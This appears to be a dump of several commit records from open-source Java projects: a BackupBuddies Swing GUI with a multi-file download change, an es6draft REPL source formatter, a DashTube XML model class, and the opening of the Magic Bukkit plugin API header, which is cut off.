actionPerformed(ActionEvent e) { setDirAndDownload(); } }); //add components to panel and specify orientation controlPanel.add(fileLabel); controlPanel.add(pathButton); controlPanel.add(uploadButton); controlPanel.add(downloadButton); controlPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return controlPanel; } //allows user to input ip and pass and connect to network public static JPanel loginPanel() { //create panel final JPanel loginPanel = new JPanel(); //create components final JLabel loginLabel = new JLabel("join a network:"); final JButton loginButton = new JButton("join"); final JTextField ipField = new JTextField("network ip"); final JTextField passField = new JTextField("network password"); //bind methods to buttons loginButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.login(ipField.getText(), passField.getText()); } }); ipField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { ipField.setText(""); } }); passField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { passField.setText(""); } }); //add components to panel and specify orientation loginPanel.add(loginLabel); loginPanel.add(ipField); loginPanel.add(passField); loginPanel.add(loginButton); loginPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return loginPanel; } //list of peers in the network //TODO: multiple selection //TODO: renders images public static JScrollPane userListPanel() { //userMap = fetchAndProcess("users"); JList<ListModel> list = new JList<ListModel>(Interface.fetchUserList()); list.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(list); pane.setPreferredSize(new Dimension(300, 100)); return pane; } //list of files you can recover //TODO: multiple selection //TODO: renders images public static JScrollPane fileListPanel(String search) { test = (Interface.fetchFileList()); hi.setModel(test); hi.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(hi); pane.setPreferredSize(new Dimension(300, 
100)); return pane; } public static void fileSearch(String search){ int cap = debug.getSize(); test.clear(); for(int i=0; i<cap; i++){ ListModel model = debug.elementAt(i); String name = model.getName(); if(name.indexOf(search) != -1){ ListModel add = new ListModel(model.getName(), model.getStatus()); test.addElement(add); } } } public static JPanel searchPanel() { JPanel panel = new JPanel(); JLabel label = new JLabel("search for file:"); JTextField search = new JTextField("search"); search.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { search.setText(""); } }); search.getDocument().addDocumentListener(new DocumentListener(){ @Override public void changedUpdate(DocumentEvent arg0) { System.out.printf("changed\n"); } @Override public void insertUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } @Override public void removeUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } }); panel.add(label); panel.add(search); return panel; } public static JPanel varsPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel varsPanelLabel = new JLabel("enter encryption key:"); final JButton lockPassButton = new JButton("confirm key"); final JTextField keyField = new JTextField("encryption key"); //bind methods to buttons lockPassButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.setEncryptKey(keyField.getText()); } }); keyField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { keyField.setText(""); } }); int min = 0; int max = 1000; int init = 1; final JLabel sliderLabel = new JLabel("storage (GB):"); final JSlider slider = new JSlider(JSlider.HORIZONTAL, min, max, init); slider.setMajorTickSpacing(max / 10); slider.setPaintTicks(true); slider.addChangeListener(new ChangeListener() { @Override public void stateChanged(ChangeEvent e) { if (!slider.getValueIsAdjusting()) { Interface.setStorageSpace(slider.getValue()); } } }); //add components to panel and specify orientation panel.add(varsPanelLabel); panel.add(keyField); panel.add(lockPassButton); panel.add(sliderLabel); panel.add(slider); panel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return panel; } public static JPanel logPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel logLabel = new JLabel("event log"); log.setEditable(false); //log.append(text + newline) panel.add(logLabel); panel.add(log); return panel; } //bind panels to frame and display the gui public static void startGui() { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { //start those intervals startIntervals(1000); //create the window and center it on screen frame = new JFrame("BackupBuddies"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setResizable(false); Container contentPane = frame.getContentPane(); SpringLayout layout = new SpringLayout(); contentPane.setLayout(layout); //these values are used to center despite pack() overriding frame.setSize(700, 400); //frame.setLocationRelativeTo(null); //FIXME: migrate to SpringLayout //this uses the easy yet terrible BorderLayout to //prototype each panel //populate the window JPanel loginPanel = new JPanel(); JPanel controlPanel = new JPanel(); JPanel searchPanel = new JPanel(); JPanel varsPanel = new JPanel(); JPanel logPanel = new JPanel(); JScrollPane userListPanel = new JScrollPane(); JScrollPane fileListPanel = new JScrollPane(); 
JScrollPane hit = new JScrollPane(); loginPanel = loginPanel(); controlPanel = controlPanel(); userListPanel = userListPanel(); fileListPanel = fileListPanel(""); searchPanel = searchPanel(); varsPanel = varsPanel(); logPanel = logPanel(); contentPane.add(loginPanel); contentPane.add(controlPanel); contentPane.add(userListPanel); contentPane.add(fileListPanel); contentPane.add(searchPanel); contentPane.add(varsPanel); contentPane.add(logPanel); contentPane.add(hit); //set locations for each panel layout.putConstraint(SpringLayout.SOUTH, varsPanel, 5, SpringLayout.SOUTH, contentPane); layout.putConstraint(SpringLayout.SOUTH, logPanel, -50, SpringLayout.SOUTH, contentPane); //layout.putConstraint(SpringLayout.EAST, logPanel, 5, // SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, loginPanel, 5, SpringLayout.NORTH, contentPane); layout.putConstraint(SpringLayout.WEST, loginPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, userListPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, userListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.NORTH, controlPanel, 5, SpringLayout.SOUTH, userListPanel); layout.putConstraint(SpringLayout.WEST, controlPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, fileListPanel, 20, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, fileListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.WEST, searchPanel, 25, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, searchPanel, 7, SpringLayout.NORTH, contentPane); //display the window //pack - layout manager auto sizes and auto locates //fixes size issue with insets/border of frame //aka use minimum frame size to display the content //frame.pack(); frame.validate(); frame.repaint(); frame.setVisible(true); } }); } }
can select multiple indices on the fileList
backupbuddies/gui/GuiMain.java
can select multiple indices on the fileList
<ide><path>ackupbuddies/gui/GuiMain.java
<ide> import java.util.Set;
<ide> import java.util.HashMap;
<ide> import java.lang.*;
<del>import java.lang.Object;
<ide>
<ide> //do not import util.*
<ide> //there is a Timer class in util and swing that conflict
<ide> //currently using swing timer
<ide> //user downloads a file to save directory (and chooses if not set)
<ide> public static void setDirAndDownload() {
<ide> //FIXME: need to have a list of uploaded files to choose from
<del> String fileToGet = "test.txt";
<add> //String fileToGet = "test.txt";
<ide> if (saveDir.getText().equals("")) {
<ide> setSaveDir();
<ide> }
<del> Interface.downloadFile(fileToGet, saveDir.getText());
<add>
<add> int[] selected = hi.getSelectedIndices();
<add> for(int i=0; i<selected.length; i++){
<add> //System.out.printf("Index: %d %s\n", i, hi.getModel().getElementAt(selected[i]).getName());
<add> Interface.downloadFile(hi.getModel().getElementAt(selected[i]).getName(), saveDir.getText());
<add> }
<ide> }
<ide>
<ide> //upload, download, save control buttons
Java
mit
03e14ae65ad79d2061c89457e6a2f632f1d211a6
0
jugglinmike/es6draft,jugglinmike/es6draft,jugglinmike/es6draft,anba/es6draft,jugglinmike/es6draft,anba/es6draft,anba/es6draft
/** * Copyright (c) 2012-2014 André Bargull * Alle Rechte vorbehalten / All Rights Reserved. Use is subject to license terms. * * <https://github.com/anba/es6draft> */ package com.github.anba.es6draft.repl; import static com.github.anba.es6draft.runtime.AbstractOperations.*; import java.util.HashSet; import java.util.Iterator; import java.util.Set; import java.util.regex.Pattern; import com.github.anba.es6draft.runtime.ExecutionContext; import com.github.anba.es6draft.runtime.internal.ScriptException; import com.github.anba.es6draft.runtime.objects.date.DateObject; import com.github.anba.es6draft.runtime.objects.date.DatePrototype; import com.github.anba.es6draft.runtime.objects.text.RegExpObject; import com.github.anba.es6draft.runtime.objects.text.RegExpPrototype; import com.github.anba.es6draft.runtime.types.Callable; import com.github.anba.es6draft.runtime.types.Property; import com.github.anba.es6draft.runtime.types.ScriptObject; import com.github.anba.es6draft.runtime.types.Symbol; import com.github.anba.es6draft.runtime.types.Type; import com.github.anba.es6draft.runtime.types.builtins.ExoticArray; /** * */ public final class SourceBuilder { private static final int MAX_STACK_DEPTH = 5; private static final int MAX_OBJECT_PROPERTIES = 30; private static final int MAX_ARRAY_PROPERTIES = 80; private SourceBuilder() { } private enum AnsiAttribute { Reset(0), Bold(1), Underline(4), Negative(7), NormalIntensity(22), UnderlineNone(24), Positive(27), TextColor(30), DefaultTextColor(39), BackgroundColor(40), DefaultBackgroundColor(49), TextColorHi(90), BackgroundColorHi(100); final int code; private AnsiAttribute(int code) { this.code = code; } int color(AnsiColor color) { return code + color.offset; } } private enum AnsiColor { Black(0), Red(1), Green(2), Yellow(3), Blue(4), Magenta(5), Cyan(6), White(7); final int offset; private AnsiColor(int offset) { this.offset = offset; } } private enum Style {/* @formatter:off */ Special(AnsiAttribute.TextColor.color(AnsiColor.Cyan), AnsiAttribute.DefaultTextColor), Number(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Boolean(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Undefined(AnsiAttribute.TextColorHi.color(AnsiColor.Black), AnsiAttribute.DefaultTextColor), Null(AnsiAttribute.Bold, AnsiAttribute.NormalIntensity), String(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Symbol(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Date(AnsiAttribute.TextColor.color(AnsiColor.Magenta), AnsiAttribute.DefaultTextColor), RegExp(AnsiAttribute.TextColor.color(AnsiColor.Red), AnsiAttribute.DefaultTextColor), ; /* @formatter:on */ private final int on; private final int off; private Style(AnsiAttribute on, AnsiAttribute off) { this(on.code, off.code); } private Style(int on, AnsiAttribute off) { this(on, off.code); } private Style(int on, int off) { this.on = on; this.off = off; } } public enum Mode { Simple, Color } /** * Returns the simple mode, source representation for {@code val}. * * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(ExecutionContext cx, Object val) { return ToSource(Mode.Simple, cx, val); } /** * Returns the source representation for {@code val}. 
* * @param mode * the source representation mode * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(Mode mode, ExecutionContext cx, Object val) { HashSet<ScriptObject> stack = new HashSet<>(); return toSource(mode, cx, stack, val); } private static String toSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { if (Type.isObject(value)) { ScriptObject objValue = Type.objectValue(value); Object toSource = Get(cx, objValue, "toSource"); if (IsCallable(toSource)) { return ToFlatString(cx, ((Callable) toSource).call(cx, objValue)); } } return format(mode, source(mode, cx, stack, value), style(stack, value)); } private static String format(Mode mode, String source, Style style) { if (mode == Mode.Simple || style == null) { return source; } return String.format("\u001B[%dm%s\u001B[%d;%dm", style.on, source, AnsiAttribute.Reset.code, style.off); } private static Style style(Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Undefined: return Style.Undefined; case Null: return Style.Null; case Boolean: return Style.Boolean; case String: return Style.String; case Number: return Style.Number; case Symbol: return Style.Symbol; case Object: default: if (IsCallable(value)) { return Style.Special; } if (stack.contains(value)) { return Style.Special; } if (value instanceof DateObject) { return Style.Date; } if (value instanceof RegExpObject) { return Style.RegExp; } return null; } } private static String source(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Null: return "null"; case Boolean: return Type.booleanValue(value) ? "true" : "false"; case String: return stringToSource(Type.stringValue(value)); case Symbol: return Type.symbolValue(value).toString(); case Number: return ToFlatString(cx, value); case Object: ScriptObject objValue = Type.objectValue(value); if (IsCallable(objValue)) { return ((Callable) objValue).toSource(); } if (stack.contains(objValue) || stack.size() > MAX_STACK_DEPTH) { return "« ... 
»"; } stack.add(objValue); try { if (objValue instanceof DateObject) { return DatePrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof RegExpObject) { return RegExpPrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof ExoticArray) { return arrayToSource(mode, cx, stack, objValue); } else { return objectToSource(mode, cx, stack, objValue); } } finally { stack.remove(objValue); } case Undefined: default: return "(void 0)"; } } private static final char[] hexdigits = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' }; private static String stringToSource(CharSequence value) { StringBuilder sb = new StringBuilder(value.length() + 2); sb.append('"'); for (int i = 0, len = value.length(); i < len; ++i) { char c = value.charAt(i); switch (c) { case '"': case '\\': sb.append('\\').append(c); break; case '\b': sb.append("\\b"); break; case '\f': sb.append("\\f"); break; case '\n': sb.append("\\n"); break; case '\r': sb.append("\\r"); break; case '\t': sb.append("\\t"); break; default: if (c < 0x20 || c > 0xff) { sb.append('\\').append('u').append(hexdigits[(c >> 12) & 0xf]) .append(hexdigits[(c >> 8) & 0xf]).append(hexdigits[(c >> 4) & 0xf]) .append(hexdigits[(c >> 0) & 0xf]); } else { sb.append(c); } } } sb.append('"'); return sb.toString(); } private static final Pattern namePattern = Pattern .compile("\\p{javaJavaIdentifierStart}\\p{javaJavaIdentifierPart}*"); private static String propertyKeyToSource(Mode mode, Object key) { if (key instanceof String) { String s = (String) key; if (namePattern.matcher(s).matches()) { return s; } return format(mode, stringToSource(s), Style.String); } assert key instanceof Symbol; String description = ((Symbol) key).getDescription(); if (description == null) { description = "Symbol()"; } return format(mode, String.format("[%s]", description), Style.Symbol); } private static Property getOwnProperty(ExecutionContext cx, ScriptObject object, Object key) { try { if (key instanceof String) { return object.getOwnProperty(cx, (String) key); } else { return object.getOwnProperty(cx, (Symbol) key); } } catch (ScriptException e) { return null; } } private static String accessorToSource(Mode mode, Property accessor) { String description; if (accessor.getGetter() != null && accessor.getSetter() != null) { description = "[Getter/Setter]"; } else if (accessor.getGetter() != null) { description = "[Getter]"; } else if (accessor.getSetter() != null) { description = "[Setter]"; } else { description = "[]"; } return format(mode, description, Style.Special); } private static String objectToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject object) { Iterator<?> keys = GetOwnPropertyNamesIterator(cx, object); if (!keys.hasNext()) { return "{}"; } StringBuilder properties = new StringBuilder(); for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) { Object k = ToPropertyKey(cx, keys.next()); String key = propertyKeyToSource(mode, k); Property prop = getOwnProperty(cx, object, k); if (prop == null || !prop.isEnumerable()) { continue; } String value; if (prop.isDataDescriptor()) { value = toSource(mode, cx, stack, prop.getValue()); } else { value = accessorToSource(mode, prop); } properties.append(", ").append(key).append(": ").append(value); i += 1; } if (keys.hasNext()) { properties.append(", [...]"); } properties.append(" }").setCharAt(0, '{'); return properties.toString(); } private static String arrayToSource(Mode mode, ExecutionContext cx, 
Set<ScriptObject> stack, ScriptObject array) { long len = ToUint32(cx, Get(cx, array, "length")); if (len <= 0) { return "[]"; } int viewLen = (int) Math.min(len, MAX_ARRAY_PROPERTIES); StringBuilder properties = new StringBuilder(); for (int index = 0; index < viewLen; ++index) { String value = toSource(mode, cx, stack, Get(cx, array, ToString(index))); properties.append(", ").append(value); } if (viewLen < len) { properties.append(", [...]"); } properties.append(" ]").setCharAt(0, '['); return properties.toString(); } }
src/main/java/com/github/anba/es6draft/repl/SourceBuilder.java
/** * Copyright (c) 2012-2014 André Bargull * Alle Rechte vorbehalten / All Rights Reserved. Use is subject to license terms. * * <https://github.com/anba/es6draft> */ package com.github.anba.es6draft.repl; import static com.github.anba.es6draft.runtime.AbstractOperations.*; import java.util.HashSet; import java.util.Iterator; import java.util.Set; import java.util.regex.Pattern; import com.github.anba.es6draft.runtime.ExecutionContext; import com.github.anba.es6draft.runtime.internal.ScriptException; import com.github.anba.es6draft.runtime.objects.date.DateObject; import com.github.anba.es6draft.runtime.objects.date.DatePrototype; import com.github.anba.es6draft.runtime.objects.text.RegExpObject; import com.github.anba.es6draft.runtime.objects.text.RegExpPrototype; import com.github.anba.es6draft.runtime.types.Callable; import com.github.anba.es6draft.runtime.types.Property; import com.github.anba.es6draft.runtime.types.ScriptObject; import com.github.anba.es6draft.runtime.types.Symbol; import com.github.anba.es6draft.runtime.types.Type; import com.github.anba.es6draft.runtime.types.builtins.ExoticArray; /** * */ public final class SourceBuilder { private static final int MAX_STACK_DEPTH = 5; private static final int MAX_OBJECT_PROPERTIES = 30; private static final int MAX_ARRAY_PROPERTIES = 80; private SourceBuilder() { } private enum AnsiAttribute { Reset(0), Bold(1), Underline(4), Negative(7), NormalIntensity(22), UnderlineNone(24), Positive(27), TextColor(30), DefaultTextColor(39), BackgroundColor(40), DefaultBackgroundColor(49), TextColorHi(90), BackgroundColorHi(100); final int code; private AnsiAttribute(int code) { this.code = code; } int color(AnsiColor color) { return code + color.offset; } } private enum AnsiColor { Black(0), Red(1), Green(2), Yellow(3), Blue(4), Magenta(5), Cyan(6), White(7); final int offset; private AnsiColor(int offset) { this.offset = offset; } } private enum Style {/* @formatter:off */ Special(AnsiAttribute.TextColor.color(AnsiColor.Cyan), AnsiAttribute.DefaultTextColor), Number(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Boolean(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Undefined(AnsiAttribute.TextColorHi.color(AnsiColor.Black), AnsiAttribute.DefaultTextColor), Null(AnsiAttribute.Bold, AnsiAttribute.NormalIntensity), String(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Symbol(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Date(AnsiAttribute.TextColor.color(AnsiColor.Magenta), AnsiAttribute.DefaultTextColor), RegExp(AnsiAttribute.TextColor.color(AnsiColor.Red), AnsiAttribute.DefaultTextColor), ; /* @formatter:on */ private final int on; private final int off; private Style(AnsiAttribute on, AnsiAttribute off) { this(on.code, off.code); } private Style(int on, AnsiAttribute off) { this(on, off.code); } private Style(int on, int off) { this.on = on; this.off = off; } } public enum Mode { Simple, Color } /** * Returns the simple mode, source representation for {@code val}. * * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(ExecutionContext cx, Object val) { return ToSource(Mode.Simple, cx, val); } /** * Returns the source representation for {@code val}. 
* * @param mode * the source representation mode * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(Mode mode, ExecutionContext cx, Object val) { HashSet<ScriptObject> stack = new HashSet<>(); return toSource(mode, cx, stack, val); } private static String toSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { if (Type.isObject(value)) { ScriptObject objValue = Type.objectValue(value); Object toSource = Get(cx, objValue, "toSource"); if (IsCallable(toSource)) { return ToFlatString(cx, ((Callable) toSource).call(cx, objValue)); } } return format(mode, source(mode, cx, stack, value), style(stack, value)); } private static String format(Mode mode, String source, Style style) { if (mode == Mode.Simple || style == null) { return source; } return String.format("\u001B[%dm%s\u001B[%d;%dm", style.on, source, AnsiAttribute.Reset.code, style.off); } private static Style style(Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Undefined: return Style.Undefined; case Null: return Style.Null; case Boolean: return Style.Boolean; case String: return Style.String; case Number: return Style.Number; case Symbol: return Style.Symbol; case Object: default: if (IsCallable(value)) { return Style.Special; } if (stack.contains(value)) { return Style.Special; } if (value instanceof DateObject) { return Style.Date; } if (value instanceof RegExpObject) { return Style.RegExp; } return null; } } private static String source(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Null: return "null"; case Boolean: return Type.booleanValue(value) ? "true" : "false"; case String: return stringToSource(Type.stringValue(value)); case Symbol: return Type.symbolValue(value).toString(); case Number: return ToFlatString(cx, value); case Object: ScriptObject objValue = Type.objectValue(value); if (IsCallable(objValue)) { return ((Callable) objValue).toSource(); } if (stack.contains(objValue) || stack.size() > MAX_STACK_DEPTH) { return "« ... 
»"; } stack.add(objValue); try { if (objValue instanceof DateObject) { return DatePrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof RegExpObject) { return RegExpPrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof ExoticArray) { return arrayToSource(mode, cx, stack, objValue); } else { return objectToSource(mode, cx, stack, objValue); } } finally { stack.remove(objValue); } case Undefined: default: return "(void 0)"; } } private static final char[] hexdigits = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' }; private static String stringToSource(CharSequence value) { StringBuilder sb = new StringBuilder(value.length() + 2); sb.append('"'); for (int i = 0, len = value.length(); i < len; ++i) { char c = value.charAt(i); switch (c) { case '"': case '\\': sb.append('\\').append(c); break; case '\b': sb.append("\\b"); break; case '\f': sb.append("\\f"); break; case '\n': sb.append("\\n"); break; case '\r': sb.append("\\r"); break; case '\t': sb.append("\\t"); break; default: if (c < 0x20 || c > 0xff) { sb.append('\\').append('u').append(hexdigits[(c >> 12) & 0xf]) .append(hexdigits[(c >> 8) & 0xf]).append(hexdigits[(c >> 4) & 0xf]) .append(hexdigits[(c >> 0) & 0xf]); } else { sb.append(c); } } } sb.append('"'); return sb.toString(); } private static final Pattern namePattern = Pattern .compile("\\p{javaJavaIdentifierStart}\\p{javaJavaIdentifierPart}*"); private static String propertyKeyToSource(Mode mode, Object key) { if (key instanceof String) { String s = (String) key; if (namePattern.matcher(s).matches()) { return s; } return format(mode, stringToSource(s), Style.String); } assert key instanceof Symbol; String description = ((Symbol) key).getDescription(); if (description == null) { description = "Symbol()"; } return format(mode, String.format("[%s]", description), Style.Symbol); } private static Property getOwnProperty(ExecutionContext cx, ScriptObject object, Object key) { try { if (key instanceof String) { return object.getOwnProperty(cx, (String) key); } else { return object.getOwnProperty(cx, (Symbol) key); } } catch (ScriptException e) { return null; } } private static String accessorToSource(Mode mode, Property accessor) { String description; if (accessor.getGetter() != null && accessor.getSetter() != null) { description = "[Getter/Setter]"; } else if (accessor.getGetter() != null) { description = "[Getter]"; } else if (accessor.getSetter() != null) { description = "[Setter]"; } else { description = "[]"; } return format(mode, description, Style.Special); } private static String objectToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject object) { Iterator<?> keys = GetOwnPropertyNamesIterator(cx, object); if (!keys.hasNext()) { return "{}"; } StringBuilder properties = new StringBuilder(); for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) { Object k = keys.next(); String key = propertyKeyToSource(mode, k); Property prop = getOwnProperty(cx, object, k); if (prop == null || !prop.isEnumerable()) { continue; } String value; if (prop.isDataDescriptor()) { value = toSource(mode, cx, stack, prop.getValue()); } else { value = accessorToSource(mode, prop); } properties.append(", ").append(key).append(": ").append(value); i += 1; } if (keys.hasNext()) { properties.append(", [...]"); } properties.append(" }").setCharAt(0, '{'); return properties.toString(); } private static String arrayToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, 
ScriptObject array) { long len = ToUint32(cx, Get(cx, array, "length")); if (len <= 0) { return "[]"; } int viewLen = (int) Math.min(len, MAX_ARRAY_PROPERTIES); StringBuilder properties = new StringBuilder(); for (int index = 0; index < viewLen; ++index) { String value = toSource(mode, cx, stack, Get(cx, array, ToString(index))); properties.append(", ").append(value); } if (viewLen < len) { properties.append(", [...]"); } properties.append(" ]").setCharAt(0, '['); return properties.toString(); } }
Add missing ToPropertyKey conversion
src/main/java/com/github/anba/es6draft/repl/SourceBuilder.java
Add missing ToPropertyKey conversion
<ide><path>rc/main/java/com/github/anba/es6draft/repl/SourceBuilder.java
<ide> }
<ide> StringBuilder properties = new StringBuilder();
<ide> for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) {
<del> Object k = keys.next();
<add> Object k = ToPropertyKey(cx, keys.next());
<ide> String key = propertyKeyToSource(mode, k);
<ide> Property prop = getOwnProperty(cx, object, k);
<ide> if (prop == null || !prop.isEnumerable()) {
Java
apache-2.0
d4cd731ec2a865b128e6e4eb4d173178363115b9
0
chriswalker/DashTube
/*
 * Copyright 2013 That Amazing Web Ltd.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.taw.dashtube.model;

import com.google.api.client.util.Key;
import com.google.api.client.xml.GenericXml;

/**
 * Simple class encapsulating the &lt;Line&gt; element.
 */
public class Line extends GenericXml {
    @Key("@ID")
    public String id;
    @Key("@Name")
    public String name;
}
DashTube/src/main/java/com/taw/dashtube/model/Line.java
/*
 * Copyright 2013 That Amazing Web Ltd.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.taw.dashtube.model;

import com.google.api.client.util.Key;
import com.google.api.client.xml.GenericXml;

/**
 * Simple class encapsulating the &lt;Line&gt; element.
 */
public class Line extends GenericXml {
    @Key("@ID")
    public int id;
    @Key("@Name")
    public String name;
}
Change ID to String (easier for comparisons)
DashTube/src/main/java/com/taw/dashtube/model/Line.java
Change ID to String (easier for comparisons)
<ide><path>ashTube/src/main/java/com/taw/dashtube/model/Line.java
<ide> */
<ide> public class Line extends GenericXml {
<ide> @Key("@ID")
<del> public int id;
<add> public String id;
<ide> @Key("@Name")
<ide> public String name;
<ide> }
Java
mit
691c7039d5ee2e905a21066c2ab269b50c0facd4
0
elBukkit/MagicAPI,elBukkit/MagicPlugin,elBukkit/MagicPlugin,elBukkit/MagicPlugin
package com.elmakers.mine.bukkit.api.magic; import java.util.Collection; import java.util.logging.Logger; import com.elmakers.mine.bukkit.api.block.UndoList; import com.elmakers.mine.bukkit.api.spell.SpellCategory; import org.bukkit.Material; import org.bukkit.command.CommandSender; import org.bukkit.configuration.ConfigurationSection; import org.bukkit.entity.Entity; import org.bukkit.entity.Player; import org.bukkit.inventory.ItemStack; import org.bukkit.plugin.Plugin; import com.elmakers.mine.bukkit.api.spell.SpellTemplate; import com.elmakers.mine.bukkit.api.wand.LostWand; import com.elmakers.mine.bukkit.api.wand.Wand; /*! \mainpage Magic Bukkit Plugin API * * \section intro_sec Introduction * * This is the API for the Magic plugin for Bukkit. Other plugins can * use this API to integrate with Magic. * * If you wish to extend Magic, such as by adding a completely new Spell * or EffectPlayer class, you will need to build against MagicLib: * * http://jenkins.elmakers.com/job/MagicLib/doxygen/ * * \section issues_sec Issues * * For issues with the API, or suggestions, use our Issue Tracker: * * http://jira.elmakers.com/browse/API/ * * \section start_sec Getting Started * * If you haven't done so already, get started with Bukkit by getting a basic * shell of a plugin working. You should at least have a working Plugin that * loads in Bukkit (add a debug print to onEnable to be sure!) before you * start trying to integrate with other Plugins. See here for general help: * * http://wiki.bukkit.org/Plugin_Tutorial * * \section maven_sec Building with Maven * * Once you have a project set up, it is easy to build against the Magic API * with Maven. Simply add the elmakers repository to your repository list, * and then add a dependency for MagicAPI. A typical setup would look like: * * <pre> * &lt;dependencies&gt; * &lt;dependency&gt; * &lt;groupId&gt;org.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;bukkit&lt;/artifactId&gt; * &lt;version&gt;1.6.4-R2.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;dependency&gt; * &lt;groupId&gt;com.elmakers.mine.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;MagicAPI&lt;/artifactId&gt; * &lt;version&gt;1.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;/dependencies&gt; * &lt;repositories&gt; * &lt;repository&gt; * &lt;id&gt;bukkit-repo&lt;/id&gt; * &lt;url&gt;http://repo.bukkit.org/content/groups/public/ &lt;/url&gt; * &lt;/repository&gt; * &lt;repository&gt; * &lt;id&gt;elmakers-repo&lt;/id&gt; * &lt;url&gt;http://maven.elmakers.com/repository/ &lt;/url&gt; * &lt;/repository&gt; * &lt;/repositories&gt; * </pre> * * \section plugin_sec Getting the API reference * * A Plugin that wishes to interact with Magic should generally check * the PluginManager for the "Magic" plugin. If present, the Plugin may * cast it to MagicAPI and use it. * * If you wish to softdepend to Magic, make sure to not use any of these API classes * unless you know the Magic plugin is loaded. Make sure you're not building the API * into your plugin, it should always be referenced externally (e.g. "provided" in Maven). * * <pre> * public MagicAPI getMagicAPI() { * Plugin magicPlugin = Bukkit.getPluginManager().getPlugin("Magic"); * if (magicPlugin == null || !(magicPlugin instanceof MagicAPI)) { * return null; * } * return (MagicAPI)magicPlugin; * } * </pre> * * \section example_sec Examples * * \subsection casting Casting Spells * * A plugin may cast spells directly, or on behalf of logged in players. 
